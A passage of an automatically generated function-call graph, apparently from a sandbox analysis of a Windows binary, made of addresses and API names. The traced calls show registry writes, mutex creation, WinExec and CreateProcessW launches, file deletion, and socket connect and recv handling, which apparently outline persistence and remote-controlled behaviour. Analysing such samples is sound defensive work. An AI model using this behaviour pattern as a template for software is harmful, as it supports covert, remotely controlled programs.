6cd1d533 67093->67094 67095 6cd1d5b4 67093->67095 67094->67095 67096 6cd1d539 67094->67096 67162 6cd1cb04 PR_SetError 67095->67162 67098 6cd1d59b 67096->67098 67102 6cd1d540 67096->67102 67109 6cd1dd89 67098->67109 67100 6cd1d5c3 PR_smprintf_free 67101 6cd1d5cb 67100->67101 67103 6cd1d5d9 67101->67103 67163 6cd1ca25 67101->67163 67104 6cd1d55c 67102->67104 67161 6cd1e359 PR_Free __cfltcvt 67102->67161 67106 6cd1d5e8 67103->67106 67108 6cd1ca25 __cfltcvt PR_Free 67103->67108 67104->67100 67104->67101 67108->67106 67166 6cd1cc25 67109->67166 67112 6cd1e19c 67113 6cd1e25e 67112->67113 67183 6cd1cb23 PR_Malloc PR_SetError memcpy _mbstowcs_s 67112->67183 67118 6cd1e27a 67113->67118 67122 6cd1ca25 __cfltcvt PR_Free 67113->67122 67117 6cd1e203 NSSUTIL_Quote 67117->67113 67121 6cd1e21b 67117->67121 67123 6cd1e28b 67118->67123 67125 6cd1ca25 __cfltcvt PR_Free 67118->67125 67119 6cd1e1aa 67119->67112 67129 6cd1e1be _NSSUTIL_Access 67119->67129 67120 6cd1de3d fgets 67158 6cd1de13 __cftof 67120->67158 67184 6cd1dd03 PR_Free PORT_Realloc_Util memcpy 67121->67184 67122->67118 67126 6cd1e2a0 67123->67126 67188 6cd1e359 PR_Free __cfltcvt 67123->67188 67125->67123 67130 6cd1e2b0 fclose 67126->67130 67138 6cd1dde9 _mbstowcs_s 67126->67138 67128 6cd1e222 67131 6cd1ca25 __cfltcvt PR_Free 67128->67131 67133 6cd1e1ed PR_smprintf_free 67129->67133 67134 6cd1e1cd PR_smprintf_free 67129->67134 67130->67138 67136 6cd1e22a 67131->67136 67132 6cd1e0f8 PORT_Realloc_Util 67132->67113 67132->67158 67133->67112 67181 6cd1cc63 memset PR_Free 67134->67181 67135 6cd1ca25 PR_Free __cfltcvt 67135->67158 67136->67118 67185 6cd1dd03 PR_Free PORT_Realloc_Util memcpy 67136->67185 67138->67104 67139 6cd1e167 feof 67141 6cd1e192 67139->67141 67139->67158 67140 6cd1e1db 67182 6cd1cb04 PR_SetError 67140->67182 67141->67112 67150 6cd1ca25 __cfltcvt PR_Free 67141->67150 67142 6cd1e2f2 67189 6cd4e3fb 5 API calls ___report_securityfailure 67142->67189 67143 6cd1dea3 strchr 67143->67158 67146 6cd1e23c 67146->67118 67186 6cd1dd03 PR_Free PORT_Realloc_Util memcpy 67146->67186 67148 6cd1e1e5 67148->67133 67149 6cd1e2f7 67150->67112 67152 6cd1e24d 67152->67118 67187 6cd1dd03 PR_Free PORT_Realloc_Util memcpy 67152->67187 67154 6cd1df60 NSSUTIL_Quote 67154->67113 67154->67158 67155 6cd1dd26 PR_Free PORT_Realloc_Util memcpy 67155->67158 67156 6cd1e040 strstr 67156->67139 67156->67158 67157 6cd1dfbe NSSUTIL_Quote 67157->67113 67157->67158 67158->67118 67158->67120 67158->67132 67158->67135 67158->67139 67158->67142 67158->67143 67158->67154 67158->67155 67158->67156 67158->67157 67159 6cd1e076 NSSUTIL_Quote 67158->67159 67160 6cd1dd03 PR_Free PORT_Realloc_Util memcpy 67158->67160 67159->67139 67160->67158 67161->67104 67162->67104 67164 6cd1ca35 67163->67164 67165 6cd1ca2e PR_Free 67163->67165 67164->67103 67167 6cd1cc36 PR_Calloc 67166->67167 67168 6cd1cc4f PR_SetError 67166->67168 67167->67168 67169 6cd1cc5e 67167->67169 67168->67169 67169->67112 67169->67138 67170 6cd1e388 67169->67170 67171 6cd1e393 67170->67171 67172 6cd1de03 67170->67172 67171->67172 67173 6cd1e399 _NSSUTIL_UTF8ToWide 67171->67173 67172->67119 67172->67158 67173->67172 67174 6cd1e3a8 _NSSUTIL_UTF8ToWide 67173->67174 67175 6cd1e3c4 _wfopen 67174->67175 67176 6cd1e3b7 67174->67176 67177 6cd1ca25 __cfltcvt PR_Free 67175->67177 67178 6cd1ca25 __cfltcvt PR_Free 67176->67178 67179 6cd1e3d5 67177->67179 67178->67172 67180 6cd1ca25 __cfltcvt PR_Free 67179->67180 67180->67172 67181->67140 67182->67148 67183->67117 67184->67128 67185->67146 67186->67152 67187->67113 67188->67126 67189->67149 67190 405e28 GetCommandLineA 67191 405e3d GetStartupInfoA 67190->67191 67199 405eb6 67191->67199 67194 405e89 67195 405e98 GetModuleHandleA 67194->67195 67202 4154eb 67195->67202 67264 405dd4 GetProcessHeap HeapAlloc 67199->67264 67201 405ec5 67201->67194 67203 415511 67202->67203 67204 41551d GetTickCount 67203->67204 67265 4010ad 67204->67265 67206 415529 GetModuleFileNameA 67266 4134a2 67206->67266 67208 41576e 67570 41267d VirtualFree GetProcessHeap RtlFreeHeap RegCloseKey 67208->67570 67210 415553 67210->67208 67273 401085 GetProcessHeap RtlAllocateHeap 67210->67273 67215 41557d 67216 415599 CreateEventA GetLastError 67215->67216 67216->67208 67217 4155bc 67216->67217 67217->67208 67218 4155c8 RegCreateKeyExA RegSetValueExA RegSetValueExA RegCloseKey 67217->67218 67274 405b4e Sleep 67218->67274 67224 415658 67225 41566b SHGetFolderPathW lstrcatW CreateDirectoryW 67224->67225 67226 4156c9 67225->67226 67227 4156a9 67225->67227 67228 4156de 67226->67228 67230 41111b 4 API calls 67226->67230 67548 41111b GetCurrentProcess OpenProcessToken 67227->67548 67231 4156e4 67228->67231 67232 4156e9 67228->67232 67234 4156d4 67230->67234 67557 40f073 CreateThread 67231->67557 67237 41574b 67232->67237 67401 4126dc 67232->67401 67234->67228 67238 4156d9 67234->67238 67236 4156b3 67553 410a3c LoadLibraryA GetProcAddress 67236->67553 67239 415751 67237->67239 67240 415756 67237->67240 67556 414f7e GetProcessHeap RtlAllocateHeap GetModuleFileNameA WinExec 67238->67556 67568 413eba 22 API calls 67239->67568 67539 404f74 67240->67539 67246 4156b8 67249 4156c4 67246->67249 67250 4156bd 67246->67250 67248 415762 67569 404c8d 6 API calls 67248->67569 67555 412f55 29 API calls 67249->67555 67554 41313a 28 API calls 67250->67554 67251 415710 67558 40373f 67251->67558 67256 4156c2 67256->67226 67259 415739 67566 405feb VirtualFree 67259->67566 67261 415742 67567 405feb VirtualFree 67261->67567 67263 415749 67263->67248 67264->67201 67265->67206 67571 401085 GetProcessHeap RtlAllocateHeap 67266->67571 67268 4134b7 CreateFileA 67269 4134dc 67268->67269 67270 4134df GetFileSize ReadFile 67268->67270 67269->67270 67271 4134fd 67270->67271 67272 4134ff CloseHandle 67270->67272 67271->67272 67272->67210 67273->67215 67572 41196e 67274->67572 67276 405b72 67577 411865 67276->67577 67284 405ba5 67607 40315e 67284->67607 67286 405bb1 67610 402fce 67286->67610 67288 405bbd 67614 403148 67288->67614 67298 405bf3 67299 413441 11 API calls 67298->67299 67300 405c12 67299->67300 67301 403549 3 API calls 67300->67301 67302 405c1f 67301->67302 67649 405feb VirtualFree 67302->67649 67304 405c27 67305 413441 11 API calls 67304->67305 67306 405c46 67305->67306 67307 403549 3 API calls 67306->67307 67308 405c53 67307->67308 67650 405feb VirtualFree 67308->67650 67310 405c5b 67311 413441 11 API calls 67310->67311 67312 405c7a 67311->67312 67313 403549 3 API calls 67312->67313 67314 405c87 67313->67314 67651 405feb VirtualFree 67314->67651 67316 405c8f 67317 413441 11 API calls 67316->67317 67318 405cdd 67317->67318 67319 403549 3 API calls 67318->67319 67320 405cea 67319->67320 67652 405feb VirtualFree 67320->67652 67322 405cfa 67323 403148 2 API calls 67322->67323 67324 405d02 67323->67324 67325 403148 2 API calls 67324->67325 67326 405d0a 67325->67326 67327 405d17 67326->67327 67660 401eb2 GetProcessHeap RtlFreeHeap 67326->67660 67329 403148 2 API calls 67327->67329 67330 405d2a 67329->67330 67653 41140c 67330->67653 67333 412a7f 67758 402446 67333->67758 67336 41111b 4 API calls 67337 412a9b 67336->67337 67338 4036f7 4 API calls 67337->67338 67339 412ac7 67338->67339 67340 403549 3 API calls 67339->67340 67341 412acf 67340->67341 67773 405feb VirtualFree 67341->67773 67343 412ad7 67344 40373f 3 API calls 67343->67344 67345 412ae3 67344->67345 67774 403447 67345->67774 67347 412aee 67781 405feb VirtualFree 67347->67781 67349 412af6 67350 4036f7 4 API calls 67349->67350 67351 412b03 67350->67351 67352 403549 3 API calls 67351->67352 67353 412b0c 67352->67353 67782 405feb VirtualFree 67353->67782 67355 412b14 67356 4036f7 4 API calls 67355->67356 67357 412b21 67356->67357 67358 403549 3 API calls 67357->67358 67359 412b2a 67358->67359 67783 405feb VirtualFree 67359->67783 67361 412b32 67362 4036f7 4 API calls 67361->67362 67363 412b3f 67362->67363 67364 403549 3 API calls 67363->67364 67365 412b48 67364->67365 67784 405feb VirtualFree 67365->67784 67367 412b50 67785 412612 67367->67785 67370 412c0a 67394 405000 67370->67394 67371 412bd8 67373 412c02 67371->67373 67805 4109a0 67371->67805 67376 403148 2 API calls 67373->67376 67376->67370 67378 40315e 2 API calls 67380 412ba0 67378->67380 67379 403549 3 API calls 67381 412bfa 67379->67381 67382 405a61 8 API calls 67380->67382 67816 405feb VirtualFree 67381->67816 67384 412baa 67382->67384 67385 4061f0 4 API calls 67384->67385 67386 412bb2 67385->67386 67803 40300a 8 API calls 67386->67803 67388 412bbc 67389 403549 3 API calls 67388->67389 67390 412bc5 67389->67390 67804 405feb VirtualFree 67390->67804 67392 412bcd 67393 403148 2 API calls 67392->67393 67393->67371 67840 405a23 67394->67840 67396 405014 67845 401e03 67396->67845 67402 4109a0 12 API calls 67401->67402 67403 4126f2 67402->67403 67864 4035b9 67403->67864 67408 412554 RegCloseKey 67409 412714 67408->67409 67503 4127da 67409->67503 67874 410c8a 67409->67874 67411 4127f6 67414 41297c 67411->67414 67415 4127ff SHGetKnownFolderPath 67411->67415 67413 412612 5 API calls 67413->67411 67417 412a26 67414->67417 67420 412979 67414->67420 67421 41299d 67414->67421 67416 4036f7 4 API calls 67415->67416 67419 41281b 67416->67419 67422 4036f7 4 API calls 67417->67422 67418 403549 3 API calls 67423 41273d 67418->67423 67424 40357c 9 API calls 67419->67424 67420->67414 67425 403549 3 API calls 67420->67425 67426 403666 11 API calls 67421->67426 67427 412a34 67422->67427 67879 405feb VirtualFree 67423->67879 67431 412828 67424->67431 67425->67421 67432 4129a8 67426->67432 67429 4036f7 4 API calls 67427->67429 67433 412a41 67429->67433 67430 412745 67880 410c3e SHCreateDirectoryExW 67430->67880 67435 4036f7 4 API calls 67431->67435 67921 405feb VirtualFree 67432->67921 67437 403447 5 API calls 67433->67437 67439 412835 67435->67439 67441 412a4a 67437->67441 67438 41274c 67442 40373f 3 API calls 67438->67442 67443 40357c 9 API calls 67439->67443 67440 4129b0 67922 401085 GetProcessHeap RtlAllocateHeap 67440->67922 67873 405feb VirtualFree 67441->67873 67446 412758 67442->67446 67447 41284b 67443->67447 67881 40357c 67446->67881 67450 40357c 9 API calls 67447->67450 67448 412a52 DeleteFileW 67451 412a61 67448->67451 67453 412852 67450->67453 67925 405feb VirtualFree 67451->67925 67457 40357c 9 API calls 67453->67457 67454 4129ba 67458 403666 11 API calls 67454->67458 67456 403447 5 API calls 67461 41276f 67456->67461 67462 412859 67457->67462 67459 4129d7 67458->67459 67923 405feb VirtualFree 67459->67923 67460 412a66 67926 405feb VirtualFree 67460->67926 67888 405feb VirtualFree 67461->67888 67891 403666 67462->67891 67466 412a6e 67927 405feb VirtualFree 67466->67927 67467 412777 67467->67460 67889 403333 7 API calls 67467->67889 67471 403666 11 API calls 67474 412873 67471->67474 67472 4129e9 67476 403666 11 API calls 67472->67476 67473 412a76 67473->67237 67473->67251 67475 403373 lstrlenW 67474->67475 67477 41287d 67475->67477 67478 4129f5 67476->67478 67908 4133b6 CreateFileA WriteFile CloseHandle 67477->67908 67924 405feb VirtualFree 67478->67924 67481 412795 67482 405a61 8 API calls 67481->67482 67484 4127a0 67482->67484 67483 412887 67909 405feb VirtualFree 67483->67909 67487 4061f0 4 API calls 67484->67487 67490 4127a8 67487->67490 67488 41288f 67910 405feb VirtualFree 67488->67910 67489 412a09 67494 412a1b WinExec 67489->67494 67492 412612 5 API calls 67490->67492 67495 4127c1 67492->67495 67493 412897 67496 410c8a 5 API calls 67493->67496 67494->67417 67890 4125df RegSetValueExW 67495->67890 67498 4128a5 67496->67498 67500 40357c 9 API calls 67498->67500 67499 4127d2 67501 403148 2 API calls 67499->67501 67502 4128b4 67500->67502 67501->67503 67504 4036f7 4 API calls 67502->67504 67503->67411 67503->67413 67505 4128c1 67504->67505 67506 40357c 9 API calls 67505->67506 67507 4128d2 67506->67507 67508 40357c 9 API calls 67507->67508 67509 4128d9 67508->67509 67510 40357c 9 API calls 67509->67510 67511 4128e2 67510->67511 67512 403666 11 API calls 67511->67512 67513 4128ee 67512->67513 67514 403666 11 API calls 67513->67514 67515 4128fc 67514->67515 67516 403373 lstrlenW 67515->67516 67517 412906 67516->67517 67911 4133b6 CreateFileA WriteFile CloseHandle 67517->67911 67519 412910 67912 405feb VirtualFree 67519->67912 67521 412919 67540 404f8f 67539->67540 67541 405db3 lstrlenW lstrcpyW VirtualAlloc 67540->67541 67542 403666 11 API calls 67540->67542 67544 405feb VirtualFree 67540->67544 67545 404fe0 Sleep 67540->67545 67983 40594b 67540->67983 67994 40577f 67540->67994 67541->67540 67542->67540 67544->67540 67545->67540 67547 404ffb 67545->67547 67547->67248 67549 41115e 67548->67549 67550 41113e GetTokenInformation 67548->67550 67551 411164 CloseHandle 67549->67551 67552 41116d 67549->67552 67550->67549 67551->67552 67552->67226 67552->67236 67553->67246 67554->67256 67555->67226 67556->67228 67557->67232 69332 40f086 35 API calls 67557->69332 67559 403751 67558->67559 67560 40376f 67558->67560 67561 403373 lstrlenW 67559->67561 67565 4120f8 CreateProcessW 67560->67565 67562 403758 67561->67562 69333 405ffa VirtualAlloc 67562->69333 67564 403764 lstrcpyW 67564->67560 67565->67259 67566->67261 67567->67263 67568->67240 67571->67268 67661 4113ed 67572->67661 67576 411996 67576->67276 67578 411881 67577->67578 67589 405b80 67577->67589 67579 4118a0 67578->67579 67580 4118fe 67578->67580 67578->67589 67666 4030cc 67579->67666 67582 4030cc 6 API calls 67580->67582 67580->67589 67587 41191c 67582->67587 67584 411fe2 6 API calls 67584->67587 67585 4118b6 67585->67589 67669 411fe2 67585->67669 67673 402312 67585->67673 67587->67584 67588 402312 6 API calls 67587->67588 67587->67589 67588->67587 67590 4034d1 lstrlenA 67589->67590 67591 403500 67590->67591 67592 4034e4 lstrlenA 67590->67592 67595 4117d8 67591->67595 67696 405f68 VirtualAlloc 67592->67696 67594 4034f4 lstrcpyA 67594->67591 67597 4117ea 67595->67597 67604 405b9d 67595->67604 67599 4034d1 4 API calls 67597->67599 67602 403148 2 API calls 67597->67602 67603 41184f 67597->67603 67597->67604 67698 405de9 LoadLibraryA GetProcAddress 67597->67698 67703 412018 67597->67703 67706 4034b5 lstrcmpA 67597->67706 67707 405feb VirtualFree 67597->67707 67599->67597 67602->67597 67708 40241a LoadLibraryA GetProcAddress ExitProcess GetProcessHeap RtlAllocateHeap 67603->67708 67606 405feb VirtualFree 67604->67606 67606->67284 67709 406045 GetProcessHeap RtlAllocateHeap 67607->67709 67609 403170 67609->67286 67611 402fe6 67610->67611 67613 402feb 67610->67613 67710 406045 GetProcessHeap RtlAllocateHeap 67611->67710 67613->67288 67615 403151 67614->67615 67616 403156 67614->67616 67711 406034 GetProcessHeap RtlFreeHeap 67615->67711 67618 405aae 67616->67618 67712 402f87 67618->67712 67621 40315e 2 API calls 67622 405ae1 67621->67622 67719 405a61 67622->67719 67627 403148 2 API calls 67628 405afe 67627->67628 67629 413441 67628->67629 67630 413455 67629->67630 67640 405be1 67629->67640 67742 401085 GetProcessHeap RtlAllocateHeap 67630->67742 67632 413460 67743 4036f7 lstrlenW 67632->67743 67634 413483 67635 403549 3 API calls 67634->67635 67636 41348b 67635->67636 67748 405feb VirtualFree 67636->67748 67638 413493 67749 401099 GetProcessHeap RtlFreeHeap 67638->67749 67641 403549 67640->67641 67642 403574 67641->67642 67643 40355b 67641->67643 67648 405feb VirtualFree 67642->67648 67752 403496 lstrlenW 67643->67752 67645 403562 67646 405f68 VirtualAlloc 67645->67646 67647 403569 lstrcpyW 67646->67647 67647->67642 67648->67298 67649->67304 67650->67310 67651->67316 67652->67322 67753 411644 67653->67753 67657 41141c 67757 405feb VirtualFree 67657->67757 67659 405d32 67659->67333 67660->67327 67665 4117b7 CreateMutexA 67661->67665 67663 4113fd 67664 406099 GetProcessHeap HeapAlloc 67663->67664 67664->67576 67665->67663 67685 40600b 67666->67685 67668 4030e2 67668->67585 67670 411ffb 67669->67670 67671 4030cc 6 API calls 67670->67671 67672 412010 67671->67672 67672->67585 67674 40232c 67673->67674 67676 4023e0 67673->67676 67694 406099 GetProcessHeap HeapAlloc 67674->67694 67677 402fce 2 API calls 67676->67677 67678 402408 67677->67678 67679 403148 2 API calls 67678->67679 67680 402413 67679->67680 67680->67585 67681 4023d1 67681->67676 67695 401eb2 GetProcessHeap RtlFreeHeap 67681->67695 67682 402355 67682->67681 67684 402fce 2 API calls 67682->67684 67684->67682 67686 406016 67685->67686 67687 40600f GetProcessHeap RtlAllocateHeap 67685->67687 67689 406022 GetProcessHeap RtlReAllocateHeap 67686->67689 67690 40601a 67686->67690 67687->67668 67689->67668 67693 406034 GetProcessHeap RtlFreeHeap 67690->67693 67692 40601f 67692->67668 67693->67692 67694->67682 67695->67676 67697 405f86 67696->67697 67697->67594 67699 405e27 67698->67699 67700 405e08 67698->67700 67699->67597 67701 405e0c 67700->67701 67702 405e1f ExitProcess 67700->67702 67701->67702 67704 402fce 2 API calls 67703->67704 67705 412040 67704->67705 67705->67597 67706->67597 67707->67597 67708->67604 67709->67609 67710->67613 67711->67616 67740 406045 GetProcessHeap RtlAllocateHeap 67712->67740 67714 402f96 67715 4030cc 6 API calls 67714->67715 67716 402fbf 67715->67716 67741 406034 GetProcessHeap RtlFreeHeap 67716->67741 67718 402fc6 67718->67621 67720 405a73 67719->67720 67721 405a95 67719->67721 67723 402f87 8 API calls 67720->67723 67722 40315e 2 API calls 67721->67722 67724 405aa5 67722->67724 67725 405a85 67723->67725 67729 4061f0 67724->67729 67726 402fce 2 API calls 67725->67726 67727 405a8d 67726->67727 67728 403148 2 API calls 67727->67728 67728->67721 67730 40315e 2 API calls 67729->67730 67731 406208 67730->67731 67732 40315e 2 API calls 67731->67732 67733 406248 67732->67733 67734 403148 2 API calls 67733->67734 67735 406250 67734->67735 67736 403148 2 API calls 67735->67736 67737 406258 67736->67737 67738 403148 2 API calls 67737->67738 67739 405af3 67738->67739 67739->67627 67740->67714 67741->67718 67742->67632 67744 405f68 VirtualAlloc 67743->67744 67745 403712 lstrlenW 67744->67745 67750 406077 67745->67750 67747 40372c KiUserExceptionDispatcher 67747->67634 67748->67638 67749->67640 67751 406083 67750->67751 67751->67747 67752->67645 67754 411414 67753->67754 67755 41164d CloseHandle 67753->67755 67756 4117a2 ReleaseMutex CloseHandle 67754->67756 67755->67754 67756->67657 67757->67659 67759 402fce 2 API calls 67758->67759 67760 402468 67759->67760 67761 403549 3 API calls 67760->67761 67762 402474 67761->67762 67763 403549 3 API calls 67762->67763 67764 40248c 67763->67764 67765 403549 3 API calls 67764->67765 67766 40249e 67765->67766 67767 403549 3 API calls 67766->67767 67768 4024aa 67767->67768 67769 403549 3 API calls 67768->67769 67770 4024bc 67769->67770 67771 402fce 2 API calls 67770->67771 67772 4024ec 67771->67772 67772->67336 67773->67343 67817 403373 67774->67817 67776 403459 67777 403373 lstrlenW 67776->67777 67778 403462 67777->67778 67820 405f8c 67778->67820 67781->67349 67782->67355 67783->67361 67784->67367 67786 412624 67785->67786 67787 412657 RegOpenKeyExW 67785->67787 67831 410c50 RegOpenKeyExW RegCloseKey 67786->67831 67788 41266b 67787->67788 67788->67370 67788->67371 67794 412569 RegQueryValueExW 67788->67794 67790 41262e 67790->67787 67791 412632 RegCreateKeyExW 67790->67791 67791->67788 67792 412650 67791->67792 67832 412554 67792->67832 67795 412596 67794->67795 67802 4125d0 67794->67802 67835 401085 GetProcessHeap RtlAllocateHeap 67795->67835 67797 41259e RegQueryValueExW 67798 4125ba 67797->67798 67797->67802 67799 4030cc 6 API calls 67798->67799 67800 4125c6 67799->67800 67800->67802 67836 401099 GetProcessHeap RtlFreeHeap 67800->67836 67802->67371 67802->67378 67803->67388 67804->67392 67837 401085 GetProcessHeap RtlAllocateHeap 67805->67837 67807 4109b2 GetModuleFileNameW 67808 4036f7 4 API calls 67807->67808 67809 4109d0 67808->67809 67810 403549 3 API calls 67809->67810 67811 4109d8 67810->67811 67838 405feb VirtualFree 67811->67838 67813 4109e0 67839 401099 GetProcessHeap RtlFreeHeap 67813->67839 67815 4109e6 67815->67379 67816->67373 67818 403381 67817->67818 67819 403378 lstrlenW 67817->67819 67818->67776 67819->67776 67821 405fa2 67820->67821 67822 405fa7 67820->67822 67828 405f48 VirtualQuery 67821->67828 67823 405fb7 67822->67823 67829 405ffa VirtualAlloc 67822->67829 67826 403472 lstrcatW 67823->67826 67830 405feb VirtualFree 67823->67830 67826->67347 67828->67822 67829->67823 67830->67826 67831->67790 67833 412564 67832->67833 67834 41255c RegCloseKey 67832->67834 67833->67787 67834->67833 67835->67797 67836->67802 67837->67807 67838->67813 67839->67815 67841 4032d5 VirtualAlloc 67840->67841 67842 405a2c 67841->67842 67863 4117b7 CreateMutexA 67842->67863 67844 405a46 WSAStartup 67844->67396 67846 40315e 2 API calls 67845->67846 67847 401e25 67846->67847 67848 40373f 3 API calls 67847->67848 67849 401e31 67848->67849 67850 40373f 3 API calls 67849->67850 67851 401e49 67850->67851 67852 40373f 3 API calls 67851->67852 67853 401e5b 67852->67853 67854 40373f 3 API calls 67853->67854 67855 401e67 67854->67855 67856 40373f 3 API calls 67855->67856 67857 401e79 67856->67857 67858 40315e 2 API calls 67857->67858 67859 401ea9 67858->67859 67860 4032d5 67859->67860 67861 405f68 VirtualAlloc 67860->67861 67862 4032e0 67861->67862 67862->67224 67863->67844 67928 401085 GetProcessHeap RtlAllocateHeap 67864->67928 67866 4035d5 67929 4033d1 67866->67929 67870 403626 67871 412514 RegCreateKeyExW 67870->67871 67872 41253f 67871->67872 67872->67408 67873->67448 67965 401052 67874->67965 67877 4036f7 4 API calls 67878 410ccf 67877->67878 67878->67418 67879->67430 67880->67438 67882 4036f7 4 API calls 67881->67882 67883 40358d 67882->67883 67884 403447 5 API calls 67883->67884 67885 403595 67884->67885 67967 405feb VirtualFree 67885->67967 67887 40359d 67887->67456 67888->67467 67889->67481 67890->67499 67892 4032d5 VirtualAlloc 67891->67892 67893 403679 67892->67893 67894 4036e5 67893->67894 67895 403373 lstrlenW 67893->67895 67894->67471 67896 40368a WideCharToMultiByte 67895->67896 67968 405ffa VirtualAlloc 67896->67968 67898 4036a2 67899 403373 lstrlenW 67898->67899 67900 4036b4 WideCharToMultiByte 67899->67900 67901 4034d1 4 API calls 67900->67901 67902 4036cd 67901->67902 67969 403237 67902->67969 67906 4036de 67978 405feb VirtualFree 67906->67978 67908->67483 67909->67488 67910->67493 67911->67519 67912->67521 67921->67440 67922->67454 67923->67472 67924->67489 67925->67460 67926->67466 67927->67473 67928->67866 67930 4034d1 4 API calls 67929->67930 67931 4033e7 67930->67931 67941 4031af 67931->67941 67934 403447 5 API calls 67935 4033f6 67934->67935 67958 405feb VirtualFree 67935->67958 67937 4033fe 67959 405feb VirtualFree 67937->67959 67939 40340a 67940 401099 GetProcessHeap RtlFreeHeap 67939->67940 67940->67870 67960 40319e 67941->67960 67943 4031c6 67944 40322e 67943->67944 67945 40319e lstrlenA 67943->67945 67944->67934 67946 4031d3 MultiByteToWideChar 67945->67946 67947 405f68 VirtualAlloc 67946->67947 67948 4031ed 67947->67948 67949 40319e lstrlenA 67948->67949 67950 4031f7 MultiByteToWideChar 67949->67950 67951 4036f7 4 API calls 67950->67951 67952 403216 67951->67952 67953 403549 3 API calls 67952->67953 67954 40321f 67953->67954 67963 405feb VirtualFree 67954->67963 67956 403227 67964 405feb VirtualFree 67956->67964 67958->67937 67959->67939 67961 4031a3 lstrlenA 67960->67961 67962 4031ac 67960->67962 67961->67943 67962->67943 67963->67956 67964->67944 67966 40105a SHGetSpecialFolderPathW 67965->67966 67966->67877 67967->67887 67968->67898 67979 405feb VirtualFree 67969->67979 67971 403245 67972 403269 67971->67972 67980 403484 67971->67980 67977 405feb VirtualFree 67972->67977 67974 403257 67975 405f68 VirtualAlloc 67974->67975 67976 40325e lstrcatA 67975->67976 67976->67972 67977->67906 67978->67894 67979->67971 67981 403493 67980->67981 67982 403489 lstrlenA 67980->67982 67981->67974 67982->67974 67984 403237 4 API calls 67983->67984 67985 405963 67984->67985 68023 41178e WaitForSingleObject 67985->68023 67987 405974 getaddrinfo 67988 4059a2 socket 67987->67988 67989 4059fc 67987->67989 67988->67989 67990 4059bd htons freeaddrinfo connect 67988->67990 68024 405feb VirtualFree 67989->68024 67990->67989 67991 405a12 ReleaseMutex 67990->67991 67991->67989 67993 405a09 67993->67540 67995 40578c 67994->67995 67996 405944 67995->67996 67997 40579b setsockopt 67995->67997 67996->67545 67998 4057cc 67997->67998 67999 4034d1 4 API calls 67998->67999 68000 4057e2 67999->68000 68025 403115 68000->68025 68004 4057f9 recv 68021 4057f3 68004->68021 68005 40592c 68006 403148 2 API calls 68005->68006 68008 405934 68006->68008 68007 4030cc 6 API calls 68007->68021 68010 403148 2 API calls 68008->68010 68009 40315e GetProcessHeap RtlAllocateHeap 68009->68021 68011 40593c 68010->68011 68012 403148 2 API calls 68011->68012 68012->67996 68013 4061f0 GetProcessHeap RtlFreeHeap GetProcessHeap RtlAllocateHeap 68013->68021 68014 403148 GetProcessHeap RtlFreeHeap 68014->68021 68015 405863 recv 68016 40591c 68015->68016 68015->68021 68017 403148 2 API calls 68016->68017 68018 405924 68017->68018 68020 403148 2 API calls 68018->68020 68019 4030fe GetProcessHeap RtlFreeHeap 68019->68021 68020->68005 68021->68004 68021->68005 68021->68007 68021->68009 68021->68013 68021->68014 68021->68015 68021->68019 68031 40507e 68021->68031 68023->67987 68024->67993 68026 403484 lstrlenA 68025->68026 68027 40312d 68026->68027 68028 4030cc 6 API calls 68027->68028 68029 403136 68028->68029 68030 405feb VirtualFree 68029->68030 68030->68021 68032 405093 68031->68032 68033 4050a8 68031->68033 68032->68033 68152 40568f 68032->68152 68263 4030fe 68032->68263 68035 4030cc 6 API calls 68033->68035 68033->68152 68036 4050f7 68035->68036 68037 4053d2 68036->68037 68038 405105 68036->68038 68041 4053db 68037->68041 68042 40552e 68037->68042 68039 4053b5 68038->68039 68040 40510b 68038->68040 68286 406099 GetProcessHeap HeapAlloc 68039->68286 68045 405114 68040->68045 68046 40527c 68040->68046 68048 405511 68041->68048 68049 4053e1 68041->68049 68043 405533 68042->68043 68044 4055ad 68042->68044 68054 405535 68043->68054 68055 405597 68043->68055 68056 4055db 68044->68056 68070 4055d3 68044->68070 68071 4055b7 68044->68071 68057 40511a 68045->68057 68058 40525f 68045->68058 68050 405341 68046->68050 68051 405287 68046->68051 68295 406099 GetProcessHeap HeapAlloc 68048->68295 68052 4054a6 68049->68052 68053 4053ea 68049->68053 68068 405390 68050->68068 68069 405346 68050->68069 68060 40531c 68051->68060 68061 40528d 68051->68061 68075 4054f4 68052->68075 68076 4054ab 68052->68076 68062 4053f0 68053->68062 68063 40548f 68053->68063 68064 405581 68054->68064 68065 40553a 68054->68065 68300 406099 GetProcessHeap HeapAlloc 68055->68300 68098 40514a 68056->68098 68303 406099 GetProcessHeap HeapAlloc 68056->68303 68072 405125 68057->68072 68073 4051d7 68057->68073 68277 406099 GetProcessHeap HeapAlloc 68058->68277 68282 406099 GetProcessHeap HeapAlloc 68060->68282 68078 405292 68061->68078 68079 4052ff 68061->68079 68089 405472 68062->68089 68090 4053f5 68062->68090 68291 406099 GetProcessHeap HeapAlloc 68063->68291 68299 406099 GetProcessHeap HeapAlloc 68064->68299 68080 405540 68065->68080 68081 405564 68065->68081 68285 406099 GetProcessHeap HeapAlloc 68068->68285 68094 40535e 68069->68094 68069->68098 68283 406099 GetProcessHeap HeapAlloc 68069->68283 68302 406099 GetProcessHeap HeapAlloc 68070->68302 68071->68098 68301 406099 GetProcessHeap HeapAlloc 68071->68301 68086 4051ba 68072->68086 68087 40512b 68072->68087 68083 405245 68073->68083 68084 4051dc 68073->68084 68294 406099 GetProcessHeap HeapAlloc 68075->68294 68088 4054c2 68076->68088 68076->68098 68292 406099 GetProcessHeap HeapAlloc 68076->68292 68095 4052e2 68078->68095 68096 405298 68078->68096 68281 406099 GetProcessHeap HeapAlloc 68079->68281 68105 405546 68080->68105 68106 40555a 68080->68106 68298 406099 GetProcessHeap HeapAlloc 68081->68298 68276 406099 GetProcessHeap HeapAlloc 68083->68276 68107 4051e2 68084->68107 68108 40522b 68084->68108 68271 406099 GetProcessHeap HeapAlloc 68086->68271 68099 40519d 68087->68099 68100 40512f 68087->68100 68088->68098 68293 406099 GetProcessHeap HeapAlloc 68088->68293 68290 406099 GetProcessHeap HeapAlloc 68089->68290 68110 405455 68090->68110 68111 4053fb 68090->68111 68094->68098 68284 406099 GetProcessHeap HeapAlloc 68094->68284 68280 406099 GetProcessHeap HeapAlloc 68095->68280 68115 4052c5 68096->68115 68116 40529e 68096->68116 68164 404cd7 68098->68164 68270 406099 GetProcessHeap HeapAlloc 68099->68270 68118 405180 68100->68118 68119 405135 68100->68119 68105->68098 68124 405550 68105->68124 68297 412f55 29 API calls 68106->68297 68125 405210 68107->68125 68126 4051e8 68107->68126 68275 406099 GetProcessHeap HeapAlloc 68108->68275 68289 406099 GetProcessHeap HeapAlloc 68110->68289 68129 405401 68111->68129 